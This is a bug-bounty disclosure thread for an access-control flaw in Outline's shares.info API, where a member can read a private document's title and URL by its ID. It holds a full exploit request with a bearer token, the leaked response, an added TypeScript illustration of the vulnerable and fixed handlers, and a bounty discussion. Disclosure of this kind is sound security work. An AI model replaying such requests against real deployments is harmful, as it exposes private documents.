unprivileged user can get document details in outline/outline
Reported on
Jul 1st 2022
Description
An unprivileged user can see the details of any document.
Proof of Concept
1. From the admin account, add a new user called user-B with the member role.
2. From the admin account, create a private collection and do not share it with any member. Set the following permission for this collection: Default Access --> No access
3. From the admin account, add a new document to this collection. user-B should not be able to see this document's details. Assume the documentId of this document is 1ad60950-9e50-4316-8cd9-6f4ff49d7f31.
4. From the user-B account, send the request below to get the details of this document:
```http
POST /api/shares.info HTTP/1.1
Host: myacc.getoutline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 68
X-Editor-Version: 12.0.0
Origin: https://myacc.getoutline.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImMzYTRjNzdhLWY4YjctNDJkMy05MjZhLTQzNWY3OTQ5ZDkwZSIsInR5cGUiOiJzZXNzaW9uIiwiaWF0IjoxNjU2Njg0Njg1fQ.UmVUcAfPXqhWuGI_i8qZemBwDpN5nZN6tovq_sMPnIA
Te: trailers
Connection: close
ACCOUNT: TEST2

{"documentId":"1ad60950-9e50-4316-8cd9-6f4ff49d7f31","apiVersion":4}
```
Here, replace documentId with the documentId noted above. You can supply the documentId of any document in any user's private collection.
Response:
```json
{
  "data": {
    "id": "ec76aaf3-815d-4db8-a177-c5b4e124172c",
    "documentId": "1ad60950-9e50-4316-8cd9-6f4ff49d7f31",
    "documentTitle": "dcco2",
    "documentUrl": "/doc/dcco2-MphGaOA1Ls",
    "published": false,
    "url": "https://myacc.getoutline.com/share/ec76aaf3-815d-4db8-a177-c5b4e124172c",
    "createdBy": {
      "id": "09da9275-6dbc-48cd-9026-a3dc255c441c",
      "name": "myname",
      "avatarUrl": "https://outline-production-attachments.s3-accelerate.amazonaws.com/avatars/09da9275-6dbc-48cd-9026-a3dc255c441c/86867337-db3f-4713-97aa-505fa51be224",
      "color": "#9E5CF7",
      "isAdmin": true,
      "isSuspended": false,
      "isViewer": false,
      "createdAt": "2022-07-01T13:34:59.700Z",
      "updatedAt": "2022-07-01T19:40:32.477Z",
      "lastActiveAt": "2022-07-01T19:40:32.477Z"
    },
    "includeChildDocuments": false,
    "createdAt": "2022-07-01T16:39:48.101Z",
    "updatedAt": "2022-07-01T19:43:44.866Z"
  },
  "policies": [
    {
      "id": "ec76aaf3-815d-4db8-a177-c5b4e124172c",
      "abilities": {
        "read": true,
        "update": true,
        "revoke": false
      }
    }
  ],
  "status": 200,
  "ok": true
}
```
Impact
An unprivileged user can get the details of any user's document using its documentId.
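As an added illustration that is not part of this report and not Outline's own code: the TypeScript below models the authorization gap described above with a hypothetical in-memory data model. The `User`, `Collection`, `Doc` and `Share` types, the `canRead` policy, the two handler functions and the sample data are assumptions made for the example, not Outline's API. It places the vulnerable handler shape, which resolves a Share by documentId and returns the document's title and URL path without checking the caller's access, beside a hardened handler that authorizes read on the document first. It also replays the grant-then-revoke case discussed below: a team member who noted a documentId while they had access gets a 403 once that access is revoked.

```typescript
// Added example, not Outline's code: models the missing authorization check
// behind POST /api/shares.info with a hypothetical in-memory data model.

type User = { id: string; isAdmin: boolean };
type Collection = { id: string; defaultAccess: "read" | "none"; memberIds: Set<string> };
type Doc = { id: string; title: string; urlPath: string; collectionId: string };
type Share = { id: string; documentId: string; published: boolean };
type ShareInfo = {
  status: number;
  data?: { shareId: string; documentTitle: string; documentUrl: string };
};

// Constructed sample data mirroring the report: an admin, an unprivileged member
// (user-B), a private collection with Default Access = No access, one document in
// it, and a Share record for that document.
const admin: User = { id: "admin", isAdmin: true };
const userB: User = { id: "user-B", isAdmin: false };
const collections: Record<string, Collection> = {
  "coll-private": { id: "coll-private", defaultAccess: "none", memberIds: new Set(["admin"]) },
};
const documents: Record<string, Doc> = {
  "doc-1": { id: "doc-1", title: "dcco2", urlPath: "/doc/dcco2-MphGaOA1Ls", collectionId: "coll-private" },
};
const shares: Share[] = [{ id: "share-1", documentId: "doc-1", published: false }];

// Read policy (assumed): admins, explicit collection members, or anyone when the
// collection's default access is "read".
function canRead(user: User, doc: Doc): boolean {
  const collection = collections[doc.collectionId];
  if (!collection) return false;
  if (user.isAdmin || collection.memberIds.has(user.id)) return true;
  return collection.defaultAccess === "read";
}

function shareResponse(share: Share, doc: Doc): ShareInfo {
  return { status: 200, data: { shareId: share.id, documentTitle: doc.title, documentUrl: doc.urlPath } };
}

// Vulnerable shape: look the Share up by documentId and answer from it. The caller
// is never asked whether they may read the document, so any team member holding a
// documentId learns the document's current title and URL path.
function sharesInfoVulnerable(_user: User, documentId: string): ShareInfo {
  const share = shares.find((s) => s.documentId === documentId);
  const doc = share ? documents[share.documentId] : undefined;
  if (!share || !doc) return { status: 404 };
  return shareResponse(share, doc);
}

// Hardened shape: authorize "read" on the document before touching the Share.
// Unknown and forbidden documents get the same 403, so the endpoint is not an
// oracle for the existence of private documents or of their Share records.
function sharesInfoFixed(user: User, documentId: string): ShareInfo {
  const doc = documents[documentId];
  if (!doc || !canRead(user, doc)) return { status: 403 };
  const share = shares.find((s) => s.documentId === documentId);
  if (!share) return { status: 404 };
  return shareResponse(share, doc);
}

function grantAccess(collectionId: string, userId: string): void {
  collections[collectionId]?.memberIds.add(userId);
}
function revokeAccess(collectionId: string, userId: string): void {
  collections[collectionId]?.memberIds.delete(userId);
}

// Replays the report and the grant-then-revoke case, returning the status each
// handler gives at each stage. Access is restored to its initial state afterwards.
function replayReport(): Record<string, number> {
  const result: Record<string, number> = {};
  result.vulnerableNoAccess = sharesInfoVulnerable(userB, "doc-1").status; // 200: leaks
  result.fixedNoAccess = sharesInfoFixed(userB, "doc-1").status;           // 403
  grantAccess("coll-private", userB.id);
  result.fixedWhileMember = sharesInfoFixed(userB, "doc-1").status;        // 200
  revokeAccess("coll-private", userB.id);
  result.fixedAfterRevoke = sharesInfoFixed(userB, "doc-1").status;        // 403
  result.fixedAdmin = sharesInfoFixed(admin, "doc-1").status;              // 200
  return result;
}

console.log(replayReport());
```

The order of checks in the hardened handler is the point: the permission decision is made on the document the caller named, before any Share row is consulted, so a caller without read access learns nothing from the response, including whether a Share record exists at all.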
So, the reproduction steps are:
- The attacker must be on the same team
- The document or one of its parents must have a Share record in the database
- The attacker must guess or otherwise obtain a UUID
The data that's leaked is just the document name and url path. The user information doesn't really count because you're already on the same team and can access that irregardless.
Does that sound right?
> The attacker must be on the same team

Yes.

> The document or one of its parents must have a Share record in the database

Yes. But this document is private. This document is created under a private collection by admin and the collection has no other user/group assigned to it. Only admin has permission in this collection and Default Access --> No Access for this collection.

> The attacker must guess or otherwise obtain a UUID

ID guessing is not possible because it is a long hash value.
There are two ways that an attacker can get the UUID:
1. Previously, admin assigned/shared this document with the attacker. Now the attacker has permission, and during this time the attacker writes down the documentId. After that, admin revoked the attacker's access to this document.
So, the attacker does not have permission to access this document but already has the documentId.
2. The documentId is leaked and the attacker got that documentId.

> The data that's leaked is just the document name and url path. The user information doesn't really count because you're already on the same team and can access that irregardless

Yes, the data leaked are the document title and url.
If admin modified the document title, then using this bug the attacker can get the document title or url.
Okay, so TLDR:
If you've had access to a document before and held onto the ID then once you no longer have access you can use the API directly to find out any changes to the title.
It's a good find and definitely a bug in the logic here, but the real-life impact is pretty much negligible.
@maintainer so this report does not qualify for bounty reward?
I don't know how the bounty amount works, I marked it as valid
@maintainer
If you directly mark the report as Low or None then it does not reward bounty.
But if you mark the report as Low by calculating CVSS score then it gives bounty.
Let me know whether this report deserves a bounty or not.
@maintainer
Bounties are assigned according to report severity and paid by the huntr team.
Here is the bounty table:
High ---> $900
Medium ---> $300
Low ---> $100
@maintainer so this report does not qualify for bounty reward?